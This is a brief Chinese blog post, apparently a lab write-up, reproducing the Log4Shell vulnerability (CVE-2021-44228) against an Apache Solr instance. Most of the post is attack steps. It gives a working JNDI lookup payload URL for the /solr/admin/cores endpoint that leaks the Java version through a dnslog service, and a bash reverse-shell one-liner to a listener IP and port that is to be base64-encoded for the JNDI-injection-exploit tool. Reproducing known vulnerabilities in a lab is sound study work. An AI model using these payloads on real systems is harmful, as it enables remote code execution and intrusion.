log4j2(CVE-2021-44228)复现

1.启动漏洞环境

2.通过dnslog验证漏洞
先获取一个subdomain

3.可利用/admin/cores传参

4.构造payload 访问
http://192.168.80.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.9uu1fq.dnslog.cn

5.看dns回显 漏洞存在

6.反弹shell
bash -i >& /dev/tcp/192.168.80.151/1122 0>&1
对payload进行base64编码

7.利用JNDI-injection-exploit工具

8.在攻击机上监听

9.get提交 替换payload 在这其中任意一个

10.访问 建立会话

posted @ 2024-05-17 14:28  4A16  阅读(3)  评论(0编辑  收藏  举报